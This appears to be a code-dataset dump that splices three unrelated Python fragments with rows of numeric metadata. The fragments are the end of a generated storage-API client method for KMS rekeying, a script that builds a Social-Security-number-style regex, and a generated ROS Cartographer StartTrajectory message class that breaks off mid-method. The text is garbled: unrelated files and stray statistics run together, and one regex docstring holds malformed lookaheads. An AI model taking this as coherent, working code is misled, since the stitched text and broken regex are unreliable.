When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_external_kms_re_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_external_kms_re_key`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_external_kms_re_key`")
resource_path = '/storage-systems/{system-id}/symbol/externalKMSReKey'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WrappedLockKeyReturn',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 40.312867
| 853
| 0.544451
| 5,809
| 61,719
| 5.621622
| 0.082803
| 0.035277
| 0.029397
| 0.019108
| 0.822452
| 0.815868
| 0.805977
| 0.784144
| 0.772079
| 0.772079
| 0
| 0.001189
| 0.387028
| 61,719
| 1,530
| 854
| 40.339216
| 0.861969
| 0.345048
| 0
| 0.853088
| 0
| 0
| 0.20703
| 0.070269
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021703
| false
| 0
| 0.010017
| 0
| 0.053422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22224e1cbba9cf55ec440b0af603fa6d6018322e
| 7,603
|
py
|
Python
|
regex_gen.py
|
jefflombard/regex
|
834eebed5c1a819d9fe257c5fd83406e8c8c2ab4
|
[
"MIT"
] | null | null | null |
regex_gen.py
|
jefflombard/regex
|
834eebed5c1a819d9fe257c5fd83406e8c8c2ab4
|
[
"MIT"
] | null | null | null |
regex_gen.py
|
jefflombard/regex
|
834eebed5c1a819d9fe257c5fd83406e8c8c2ab4
|
[
"MIT"
] | null | null | null |
# First 3 digits
first = ['00[1-9]','0[1-9][0-9]','[1-5][0-9][0-9]','6[0-5][0-9]','66[0-5]','66[7-9]','6[7-9][0-9]','[7-8][0-9][0-9]']
# /00[1-9]|
# 0[1-9][0-9]|
# [1-5][0-9][0-9]|
# 6[0-5][0-9]|
# 66[0-5]|
# 66[7-9]|
# 6[7-9][0-9]|
# [7-8][0-9][0-9]/
# Middle 2 digits
middle = ['[0-9][1-9]','[1-9][0-9]']
# [0-9][1-9]
# [1-9][0-9]
# Last 4 Digits
last = ['[0-9][0-9][0-9][1-9]','[0-9][0-9][1-9][0-9]','[0-9][1-9][0-9][0-9]','[1-9][0-9][0-9][0-9]']
# [0-9][0-9][0-9][1-9]
# [0-9][0-9][1-9][0-9]
# [0-9][1-9][0-9][0-9]
# [1-9][0-9][0-9][0-9]
# Regex expression to handle dashes
dash = "\-?"
# Matches 'x' only if 'x' is followed by 'y'
# x(?=y)
for a in first:
for b in middle:
for c in last:
print(a+'(?='+dash+b+'(?='+dash+c+')'+')'+'|')
"""
00[1-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|00[1-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|00[1-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|00[1-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|00[1-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|00[1-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|00[1-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|00[1-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|0[1-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|0[1-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|0[1-9][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|0[1-9][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|0[1-9][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|0[1-9][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|0[1-9][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|0[1-9][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|[1-5][0-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|[1-5][0-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|[1-5][0-9][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|[1-5][0-9][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|[1-5][0-9][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|[1-5][0-9][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|[1-5][0-9][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|[1-5][0-9][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|6[0-5][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|6[0-5][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|6[0-5][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|6[0-5][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|6[0-5][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|6[0-5][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|6[0-5][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|6[0-5][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|66[0-5](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|66[0-5](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|66[0-5](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|66[0-5](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|66[0-5](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|66[0-5](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|66[0-5](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|66[0-5](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|66[7-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|66[7-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|66[7-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|66[7-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|66[7-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|66[7-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|66[7-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|66[7-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|6[7-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|6[7-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|6[7-9][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|6[7-9][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|6[7-9][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|6[7-9][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|6[7-9][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|6[7-9][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|[7-8][0-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|[7-8][0-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|[7-8][0-9][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|[7-8][0-9][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|[7-8][0-9][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|[7-8][0-9][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|[7-8][0-9][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|[7-8][0-9][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|
"""
"""
00[1-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|00[1-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|00[1-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|00[1-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|00[1-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|00[1-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|00[1-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|00[1-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|0[1-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|0[1-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|0[1-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|0[1-9][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|0[1-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|0[1-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|0[1-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|0[1-9][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|[1-5][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|[1-5][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|[1-5][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|[1-5][0-9][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|[1-5][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|[1-5][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|[1-5][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|[1-5][0-9][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|6[0-5][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|6[0-5][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|6[0-5][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|6[0-5][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|6[0-5][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|6[0-5][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|6[0-5][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|6[0-5][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|66[0-5](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|66[0-5](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|66[0-5](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|66[0-5](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|66[0-5](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|66[0-5](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|66[0-5](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|66[0-5](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|66[7-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|66[7-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|66[7-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|66[7-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|66[7-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|66[7-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|66[7-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|66[7-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|6[7-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|6[7-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|6[7-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|6[7-9][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|6[7-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|6[7-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|6[7-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|6[7-9][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|[7-8][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|[7-8][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|[7-8][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|[7-8][0-9][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|[7-8][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|[7-8][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|[7-8][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|[7-8][0-9][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|
"""
| 158.395833
| 3,552
| 0.326319
| 2,311
| 7,603
| 1.073561
| 0.015578
| 0.53688
| 0.727932
| 0.535268
| 0.934301
| 0.934301
| 0.934301
| 0.934301
| 0.934301
| 0.934301
| 0
| 0.312761
| 0.023938
| 7,603
| 47
| 3,553
| 161.765957
| 0.02156
| 0.044062
| 0
| 0
| 0
| 0
| 0.409186
| 0
| 0.125
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
22344d6d72ddb578754cdeae9703e2aa3af60dda
| 26,851
|
py
|
Python
|
Rover/install_isolated/lib/python2.7/dist-packages/cartographer_ros_msgs/srv/_StartTrajectory.py
|
Rose-Hulman-Rover-Team/Rover-2019-2020
|
d75a9086fa733f8a8b5240005bee058737ad82c7
|
[
"MIT"
] | 1
|
2018-10-04T14:37:00.000Z
|
2018-10-04T14:37:00.000Z
|
TrekBot_WS/install_isolated/lib/python2.7/dist-packages/cartographer_ros_msgs/srv/_StartTrajectory.py
|
Rafcin/TrekBot
|
d3dc63e6c16a040b16170f143556ef358018b7da
|
[
"Unlicense"
] | null | null | null |
TrekBot_WS/install_isolated/lib/python2.7/dist-packages/cartographer_ros_msgs/srv/_StartTrajectory.py
|
Rafcin/TrekBot
|
d3dc63e6c16a040b16170f143556ef358018b7da
|
[
"Unlicense"
] | null | null | null |
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from cartographer_ros_msgs/StartTrajectoryRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import cartographer_ros_msgs.msg
class StartTrajectoryRequest(genpy.Message):
_md5sum = "0780da312468afe59b45454db35b17ed"
_type = "cartographer_ros_msgs/StartTrajectoryRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
cartographer_ros_msgs/TrajectoryOptions options
cartographer_ros_msgs/SensorTopics topics
================================================================================
MSG: cartographer_ros_msgs/TrajectoryOptions
# Copyright 2016 The Cartographer Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
string tracking_frame
string published_frame
string odom_frame
bool provide_odom_frame
bool use_odometry
bool use_nav_sat
bool use_landmarks
bool publish_frame_projected_to_2d
int32 num_laser_scans
int32 num_multi_echo_laser_scans
int32 num_subdivisions_per_laser_scan
int32 num_point_clouds
float64 rangefinder_sampling_ratio
float64 odometry_sampling_ratio
float64 fixed_frame_pose_sampling_ratio
float64 imu_sampling_ratio
float64 landmarks_sampling_ratio
# This is a binary-encoded
# 'cartographer.mapping.proto.TrajectoryBuilderOptions' proto.
string trajectory_builder_options_proto
================================================================================
MSG: cartographer_ros_msgs/SensorTopics
# Copyright 2016 The Cartographer Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
string laser_scan_topic
string multi_echo_laser_scan_topic
string point_cloud2_topic
string imu_topic
string odometry_topic
string nav_sat_fix_topic
string landmark_topic
"""
__slots__ = ['options','topics']
_slot_types = ['cartographer_ros_msgs/TrajectoryOptions','cartographer_ros_msgs/SensorTopics']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
options,topics
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(StartTrajectoryRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.options is None:
self.options = cartographer_ros_msgs.msg.TrajectoryOptions()
if self.topics is None:
self.topics = cartographer_ros_msgs.msg.SensorTopics()
else:
self.options = cartographer_ros_msgs.msg.TrajectoryOptions()
self.topics = cartographer_ros_msgs.msg.SensorTopics()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.options.tracking_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.options.published_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.options.odom_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_5B4i5d().pack(_x.options.provide_odom_frame, _x.options.use_odometry, _x.options.use_nav_sat, _x.options.use_landmarks, _x.options.publish_frame_projected_to_2d, _x.options.num_laser_scans, _x.options.num_multi_echo_laser_scans, _x.options.num_subdivisions_per_laser_scan, _x.options.num_point_clouds, _x.options.rangefinder_sampling_ratio, _x.options.odometry_sampling_ratio, _x.options.fixed_frame_pose_sampling_ratio, _x.options.imu_sampling_ratio, _x.options.landmarks_sampling_ratio))
_x = self.options.trajectory_builder_options_proto
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.laser_scan_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.multi_echo_laser_scan_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.point_cloud2_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.imu_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.odometry_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.nav_sat_fix_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.landmark_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.options is None:
self.options = cartographer_ros_msgs.msg.TrajectoryOptions()
if self.topics is None:
self.topics = cartographer_ros_msgs.msg.SensorTopics()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.tracking_frame = str[start:end].decode('utf-8')
else:
self.options.tracking_frame = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.published_frame = str[start:end].decode('utf-8')
else:
self.options.published_frame = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.odom_frame = str[start:end].decode('utf-8')
else:
self.options.odom_frame = str[start:end]
_x = self
start = end
end += 61
(_x.options.provide_odom_frame, _x.options.use_odometry, _x.options.use_nav_sat, _x.options.use_landmarks, _x.options.publish_frame_projected_to_2d, _x.options.num_laser_scans, _x.options.num_multi_echo_laser_scans, _x.options.num_subdivisions_per_laser_scan, _x.options.num_point_clouds, _x.options.rangefinder_sampling_ratio, _x.options.odometry_sampling_ratio, _x.options.fixed_frame_pose_sampling_ratio, _x.options.imu_sampling_ratio, _x.options.landmarks_sampling_ratio,) = _get_struct_5B4i5d().unpack(str[start:end])
self.options.provide_odom_frame = bool(self.options.provide_odom_frame)
self.options.use_odometry = bool(self.options.use_odometry)
self.options.use_nav_sat = bool(self.options.use_nav_sat)
self.options.use_landmarks = bool(self.options.use_landmarks)
self.options.publish_frame_projected_to_2d = bool(self.options.publish_frame_projected_to_2d)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.trajectory_builder_options_proto = str[start:end].decode('utf-8')
else:
self.options.trajectory_builder_options_proto = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.laser_scan_topic = str[start:end].decode('utf-8')
else:
self.topics.laser_scan_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.multi_echo_laser_scan_topic = str[start:end].decode('utf-8')
else:
self.topics.multi_echo_laser_scan_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.point_cloud2_topic = str[start:end].decode('utf-8')
else:
self.topics.point_cloud2_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.imu_topic = str[start:end].decode('utf-8')
else:
self.topics.imu_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.odometry_topic = str[start:end].decode('utf-8')
else:
self.topics.odometry_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.nav_sat_fix_topic = str[start:end].decode('utf-8')
else:
self.topics.nav_sat_fix_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.landmark_topic = str[start:end].decode('utf-8')
else:
self.topics.landmark_topic = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.options.tracking_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.options.published_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.options.odom_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_5B4i5d().pack(_x.options.provide_odom_frame, _x.options.use_odometry, _x.options.use_nav_sat, _x.options.use_landmarks, _x.options.publish_frame_projected_to_2d, _x.options.num_laser_scans, _x.options.num_multi_echo_laser_scans, _x.options.num_subdivisions_per_laser_scan, _x.options.num_point_clouds, _x.options.rangefinder_sampling_ratio, _x.options.odometry_sampling_ratio, _x.options.fixed_frame_pose_sampling_ratio, _x.options.imu_sampling_ratio, _x.options.landmarks_sampling_ratio))
_x = self.options.trajectory_builder_options_proto
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.laser_scan_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.multi_echo_laser_scan_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.point_cloud2_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.imu_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.odometry_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.nav_sat_fix_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.landmark_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.options is None:
self.options = cartographer_ros_msgs.msg.TrajectoryOptions()
if self.topics is None:
self.topics = cartographer_ros_msgs.msg.SensorTopics()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.tracking_frame = str[start:end].decode('utf-8')
else:
self.options.tracking_frame = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.published_frame = str[start:end].decode('utf-8')
else:
self.options.published_frame = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.odom_frame = str[start:end].decode('utf-8')
else:
